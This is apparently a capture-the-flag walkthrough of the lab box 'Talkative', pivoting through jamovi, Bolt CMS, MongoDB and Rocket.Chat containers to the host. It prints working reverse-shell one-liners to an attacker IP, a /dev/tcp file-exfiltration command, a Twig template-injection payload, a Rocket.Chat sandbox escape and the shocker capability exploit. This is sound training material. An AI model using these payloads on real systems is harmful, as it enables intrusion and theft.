
Talkative
Summary
Talkative is about attacking several communication platforms and hopping between Docker containers. The first foothold is a container behind the jamovi website, where the built-in R editor gives code execution. From that container I recover credentials for Bolt CMS; as admin I edit a Twig template to get code execution in the next container. That container has an SSH client, so I SSH to the host, where I find a full Docker network. One container exposes MongoDB with no authentication, so I change my Rocket.Chat user's role to admin and get admin access to Rocket.Chat. Rocket.Chat's integration webhooks run a script, which I abuse to get a connection back to me. That container has the CAP_DAC_READ_SEARCH capability, which can be exploited to read any file on the host.
Enumeration
nmap revealed that 5 ports are open.
nmap -sCV -p- 10.10.11.155 -v -oA nmap/full --min-rate 5000
Discovered open port 8080/tcp on 10.10.11.155
Discovered open port 80/tcp on 10.10.11.155
Discovered open port 8081/tcp on 10.10.11.155
Discovered open port 3000/tcp on 10.10.11.155
Discovered open port 8082/tcp on 10.10.11.155
SSH shows as filtered, so a firewall is probably dropping my packets and nmap never sees a reply. Quick mental note: if I get a foothold that isn't the host itself, I may still be able to SSH to the host from inside the network, where the firewall may trust the source.
22/tcp filtered ssh
Talkative port 80
On port 80 is the main Talkative website.

The site has a lot of useful information, including the names of potential users on the network, which I can use later for password attacks.

The page source reveals that the site runs on Bolt CMS.

I have worked with Bolt before and know the back end normally lives at /bolt. Visiting talkative.htb/bolt:

Nothing much here. Default credentials didn't work, so I clearly need valid credentials for the Bolt back end.
Rocket Chat port 3000
Moving on to Rocket.Chat.

Default credentials didn't work here either, so I created an account to see what the platform looks like and whether it leaks anything useful.

Registration fails with "Invalid Domain", so I changed the email domain to talkative.htb, and that worked.
The only thing a normal user account tells me is that "Saul Goodman" is the admin.

Quick note: if I get Saul Goodman's credentials, or can raise my own privileges to admin, I get admin access to Rocket.Chat. Until then, on to the jamovi website.
Jamovi port 8080

I immediately notice the R logo, so I check whether I can run code. I can, so I looked up how to execute system commands from R.
R's system() takes several arguments, but I only need two: the command itself and intern.
system(command, intern = TRUE)
Jamovi root shell
I put the command I want to execute as the first argument and set intern to TRUE so the command's output is returned to the editor instead of going to the server's stdout.

Going for a reverse shell


The hostname looks like a container ID, which suggests a Docker container, and /.dockerenv confirms it. Digging around I found bolt-administration.omv in ~.
I sent this file to my attacking machine to analyze it in a comfortable environment.
cat bolt-administration.omv > /dev/tcp/10.10.14.20/9003
Receiving the data and writing it to a bolt-administration.omv file:
nc -lvnp 9003 > bolt-administration.omv
I compared the md5sum on both sides to make sure nothing went wrong during the transfer.
└─$ md5sum bolt-administration.omv
89a471297760280c51d7a48246f95628 bolt-administration.omv
root@b06821bbda78:~# md5sum bolt-administration.omv
89a471297760280c51d7a48246f95628 bolt-administration.omv
The file is a zip archive containing several files (.omv is jamovi's save format).

I unzipped it and went through the files hoping to find something useful.
xdata.json is the most interesting, because it contains credentials.
cat xdata.json| jq -c ".[]"
{"labels":[[0,"Username","Username",false],[1,"matt@talkative.htb","matt@talkative.htb",false],[2,"janit@talkative.htb","janit@talkative.htb",false],[3,"saul@talkative.htb","saul@talkative.htb",false]]}
{"labels":[[0,"Password","Password",false],[1,"jeO09ufhWD<s","jeO09ufhWD<s",false],[2,"bZ89h}V<S_DA","bZ89h}V<S_DA",false],[3,")SQWGm>9KHEA",")SQWGm>9KHEA",false]]}
{"labels":[]}
Now I need to figure out where these creds are valid. The first thing that comes to mind is SSH, but as noted above SSH is filtered from outside, so I can't connect from my machine; from this container it might work, but SSH isn't installed here. I could tunnel my own SSH client through this container, but since I still have two login forms to test the creds against, I'll try those first and come back to the tunnel if they fail.
Saul Shell
None of the creds worked on the Bolt login form. That confused me for a moment, then I tried an admin email with each of the passwords, hoping for password reuse. That got me in:
admin@talkative.htb
jeO09ufhWD<s

The configuration panel lists a lot of configuration files.

This gave me several ideas for code execution: with write permission on those files it would be easy to get code execution through PHP or YAML. I went to the Bolt section and checked config.yaml, but I had no write permission on it.

Reading on, I noticed the site uses a theme called base-2021, which is worth a look.

I went for the Twig files, since I know Twig and that write access to a template means code execution (Twig functions and filters can call PHP functions by name when no sandbox is enforced). First I inject some HTML to see whether anything happens; since this is index.twig, the change should show up on the home page of the site Bolt renders, talkative.htb.

I hit Save Changes and reloaded talkative.htb, but nothing happened. I was sure this should work, so I went back to the Bolt page and kept digging, and found a Clear the cache function.

That was the reason: the page was being served from the compiled-template cache, so my change never reached it. I cleared the cache, reloaded talkative.htb, and "ichyaboy" appeared.

Now for code execution. I used a payload from PayloadsAllTheThings. Twig's filter filter applies a callable, given by name, to every element of an array, so with no sandbox this calls PHP's system() with 'id' as its argument:
{{['id']|filter('system')}}
To be honest I went straight for a reverse shell:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.20/443 0>&1"']|filter('system')}}
I put the payload in index.twig, saved the changes, cleared the cache and started a listener on 443,
then reloaded talkative.htb and got a shell in the next Docker container.

I use script to stabilize the shell (quicker than the python pty dance):
script /dev/null -c bash
CTRL^Z
stty raw -echo; fg
export TERM=xterm
The first thing to check is whether this container has an SSH client; if so, I may be able to reach the host.

It is installed, so now I need the host's IP address.

/proc/net/arp is the kernel's ARP cache, which maps IP addresses to MAC addresses on the local network. The only entry is the container's gateway, which on Docker's default bridge network is the host itself, so that is the address to SSH to. Now I need the right credentials. After several combinations, saul with the Bolt CMS password worked:
saul
jeO09ufhWD<s

I got the user flag
saul@talkative:~$ cat user.txt
458f****************************
Rocket Chat Root Shell
Now I enumerate the box. I wanted to look at the Docker network, but the docker command isn't installed, so I have to do it by hand. I transferred a static nmap binary to enumerate the containers and the services each one runs.
First, a ping sweep for live hosts on the Docker bridge network:
nmap -sn 172.17.0.0/16
Nmap scan report for 172.17.0.2
Host is up (0.0066s latency).
Nmap scan report for 172.17.0.3
Host is up (0.0066s latency).
Nmap scan report for 172.17.0.4
Host is up (0.0065s latency).
Nmap scan report for 172.17.0.5
Host is up (0.0065s latency).
Nmap scan report for 172.17.0.6
Host is up (0.0065s latency).
Nmap scan report for 172.17.0.7
Host is up (0.0064s latency).
Nmap scan report for 172.17.0.8
Host is up (0.0064s latency).
Nmap scan report for 172.17.0.9
Host is up (0.0064s latency).
Nmap scan report for 172.17.0.10
Host is up (0.0063s latency).
Nmap scan report for 172.17.0.11
Host is up (0.0063s latency).
Nmap scan report for 172.17.0.12
Host is up (0.0029s latency).
Nmap scan report for 172.17.0.13
Host is up (0.0027s latency).
Nmap scan report for 172.17.0.14
Host is up (0.0027s latency).
Nmap scan report for 172.17.0.15
Host is up (0.0027s latency).
Nmap scan report for 172.17.0.16
Host is up (0.0026s latency).
Nmap scan report for 172.17.0.17
Host is up (0.0026s latency).
Nmap scan report for 172.17.0.18
Host is up (0.0025s latency).
Nmap scan report for 172.17.0.19
Host is up (0.0023s latency).
Now to scan the services running on these hosts:
./nmap -p- 172.17.0.2-19 --min-rate 10000 -v
Nmap scan report for 172.17.0.2
Host is up (0.00026s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
27017/tcp open unknown
Nmap scan report for 172.17.0.3
Host is up (0.00021s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
3000/tcp open unknown
Nmap scan report for 172.17.0.4
Host is up (0.000071s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.17.0.5
Host is up (0.00032s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.17.0.6
Host is up (0.00022s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.17.0.7
Host is up (0.00030s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.17.0.8
Host is up (0.00026s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.17.0.9
Host is up (0.00024s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.17.0.10
Host is up (0.00030s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.17.0.11
Host is up (0.00025s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.17.0.12
Host is up (0.00029s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.17.0.13
Host is up (0.00030s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.17.0.14
Host is up (0.00023s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.17.0.15
Host is up (0.00026s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.17.0.16
Host is up (0.00017s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.17.0.17
Host is up (0.00021s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.17.0.18
Host is up (0.00018s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.17.0.19
Host is up (0.00018s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
One host stands out: 172.17.0.2 with port 27017 open, the default MongoDB port. I can't talk to it from Saul's shell because the host has no MongoDB client, so I forward the port to my attacking machine with chisel (after transferring chisel to the victim, of course).
On my attacking machine I start the chisel server; with --reverse the client is allowed to open listening ports on my side:
./chisel server -p 8000 --reverse -v
and on the victim machine I run the client, which makes 127.0.0.1:27017 on my box forward to 172.17.0.2:27017:
./chisel client 10.10.14.20:8000 R:27017:172.17.0.2:27017
With the port forwarded I installed mongosh to work with the service. Note the startup warning below: access control is not enabled, so anyone who can reach the port has full read and write access to every database.
mongosh
Current Mongosh Log ID: 64ce2537905a5b0be716a926
Connecting to: mongodb://127.0.0.1:27017/?directConnection=true&serverSelectionTimeoutMS=2000&appName=mongosh+1.10.3
Using MongoDB: 4.0.26
Using Mongosh: 1.10.3
For mongosh info see: https://docs.mongodb.com/mongodb-shell/
To help improve our products, anonymous usage data is collected and sent to MongoDB periodically (https://www.mongodb.com/legal/privacy-policy).
You can opt-out by running the disableTelemetry() command.
------
The server generated these startup warnings when booting
2023-08-05T06:55:25.636+0000:
2023-08-05T06:55:25.636+0000: ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2023-08-05T06:55:25.636+0000: ** See http://dochub.mongodb.org/core/prodnotes-filesystem
2023-08-05T06:55:27.824+0000:
2023-08-05T06:55:27.824+0000: ** WARNING: Access control is not enabled for the database.
2023-08-05T06:55:27.824+0000: ** Read and write access to data and configuration is unrestricted.
2023-08-05T06:55:27.824+0000:
------
rs0 [direct: primary] test>
Now I have a shell on the database and can look around.
rs0 [direct: primary] test> show database;
MongoshInvalidInputError: [COMMON-10001] 'database' is not a valid argument for "show".
rs0 [direct: primary] test> show databases;
admin 104.00 KiB
config 124.00 KiB
local 11.44 MiB
meteor 4.79 MiB
rs0 [direct: primary] test> use meteor
switched to db meteor
rs0 [direct: primary] meteor> show collections
_raix_push_app_tokens
_raix_push_notifications
instances
meteor_accounts_loginServiceConfiguration
meteor_oauth_pendingCredentials
meteor_oauth_pendingRequestTokens
migrations
rocketchat__trash
...[SNIP]
users
usersSessions
view_livechat_queue_status [view]
system.views
The users collection looks interesting.
rs0 [direct: primary] meteor> db.users.find()
It returns a lot of information about the Rocket.Chat users.
Admin's data:
{
_id: 'ZLMid6a4h5YEosPQi',
createdAt: ISODate("2021-08-10T19:49:48.673Z"),
services: {
password: {
bcrypt: '$2b$10$jzSWpBq.eJ/yn/Pdq6ilB.UO/kXHB1O2A.b2yooGebUbh69NIUu5y'
},
email: {
verificationTokens: [
{
token: 'dgATW2cAcF3adLfJA86ppQXrn1vt6omBarI8VrGMI6w',
address: 'saul@talkative.htb',
when: ISODate("2021-08-10T19:49:48.738Z")
}
]
},
resume: { loginTokens: [] }
},
emails: [ { address: 'saul@talkative.htb', verified: false } ],
type: 'user',
status: 'offline',
active: true,
_updatedAt: ISODate("2023-08-05T07:06:06.305Z"),
roles: [ 'admin' ],
name: 'Saul Goodman',
lastLogin: ISODate("2022-03-15T17:06:56.543Z"),
statusConnection: 'offline',
username: 'admin',
utcOffset: 0
}
my user's data:
{
_id: 'sGpD9hCk53qF2Qdzy',
createdAt: ISODate("2023-08-05T07:24:00.826Z"),
services: {
password: {
bcrypt: '$2b$10$bmrfg6MQ1bpOrllcEJO0ue7R7R73/40LnOnKzKjzUDkZCCIZtFb9.',
reset: {
token: '8v2nfzMwF3B5m6NycHmRN2J-K_MI4hSa7_YSEFYbS69',
email: 'ichyaboy@talkative.htb',
when: ISODate("2023-08-05T07:24:04.580Z"),
reason: 'enroll'
}
},
email: {
verificationTokens: [
{
token: 'l4lkBlBSftrHMMQbSJTUTX7opNc_5LR3YZNLEt9rZVM',
address: 'ichyaboy@talkative.htb',
when: ISODate("2023-08-05T07:24:00.872Z")
}
]
},
resume: {
loginTokens: [
{
when: ISODate("2023-08-05T07:24:01.170Z"),
hashedToken: '8p/w938oOCeehYfWnk277jRoI+yfMJAjFPLhb5FqZxY='
}
]
}
},
emails: [ { address: 'ichyaboy@talkative.htb', verified: false } ],
type: 'user',
status: 'online',
active: true,
_updatedAt: ISODate("2023-08-05T08:41:05.432Z"),
roles: [ 'user' ],
name: 'ichyaboy',
lastLogin: ISODate("2023-08-05T07:24:01.167Z"),
statusConnection: 'online',
utcOffset: 2,
username: 'ichyaboy'
}
The roles key got my attention: I'm a normal user, and as noted in the Rocket Chat port 3000 section, elevating my privileges unlocks more functionality in Rocket.Chat. So the plan is to set my own roles to admin (alternatively, overwrite the admin's bcrypt hash with the hash of a password I know and log in as admin). Collection.update() is deprecated in newer shells, as the warning below says; updateOne with the same filter and $set does the same for a single document.
rs0 [direct: primary] meteor> db.users.update( {"_id":"sGpD9hCk53qF2Qdzy"} , {$set: {"roles": ["admin"]}})
DeprecationWarning: Collection.update() is deprecated. Use updateOne, updateMany, or bulkWrite.
{
acknowledged: true,
insertedId: null,
matchedCount: 1,
modifiedCount: 1,
upsertedCount: 0
}

Looking around the admin UI, I found the Integrations section, which lets you create webhooks that run a script you provide.

So my idea is to create a webhook whose script sends a shell back to me, but first I need to know which language the script is written in. Rocket.Chat's repository on GitHub is TypeScript, and the integration scripts themselves are plain JavaScript. They run in a sandboxed scope with no require, so an ordinary reverse shell snippet fails; the trick is to borrow the Function constructor from an object that was created outside the sandbox (console) and use it to compile code that runs in the host's scope.
After trying multiple scripts this one worked:
// console.log was created outside the sandbox, so its constructor is the host's Function:
// code compiled with it runs in the host scope and can reach process.mainModule.require
const require = console.log.constructor('return process.mainModule.require')();
// load child_process through the recovered loader and spawn the reverse shell
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.20/1337 0>&1'");
I saved the webhook, took its URL, started a listener on 1337 and curled the URL, and got a shell as root in the Rocket.Chat container.

Root Shell
Enumerating the box turned up no useful files, so I checked the container's capabilities. capsh isn't installed, which also breaks linpeas' capability check, so I looked in the linpeas repository for how it scans containers and found 2_container.sh. It reads the capabilities from /proc/self/status, where each set is a hexadecimal bitmask with one bit per capability:
CapInh: 0000000000000000
CapPrm: 00000000a80425fd
CapEff: 00000000a80425fd
CapBnd: 00000000a80425fd
CapAmb: 0000000000000000
I decode the effective mask on my attacking machine with capsh:

capsh --decode=a80425fd
0x00000000a80425fd=cap_chown,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
I checked whether any of these capabilities are dangerous; HackTricks has a good explanation. CAP_DAC_READ_SEARCH is not in Docker's default set. It bypasses file read and directory search permission checks and, more importantly, allows open_by_handle_at(), which the shocker exploit uses to open arbitrary inodes on the host filesystem by brute-forcing file handles, starting from a file the container shares with the host (such as the bind-mounted /etc/hostname).
I downloaded shocker.c and compiled it:
gcc shocker.c -o shocker
Transferring the binary to the box was a bit tricky because none of nc, curl or wget are installed, so on my attacking machine I ran
nc -lvnp 9004 < shocker
and on the victim machine I ran
cat < /dev/tcp/10.10.14.20/9004 > shocker
I checked the md5sums and they are identical:
└─$ md5sum shocker
63ee1dcb313b98956c2ad38e0256d1be shocker
root@c150397ccd63:~# md5sum shocker
63ee1dcb313b98956c2ad38e0256d1be shocker
Now I run it, giving the path of the host file I want to read and a filename to save its contents to:
./shocker /root/root.txt flag
root@c150397ccd63:~# cat root
3173****************************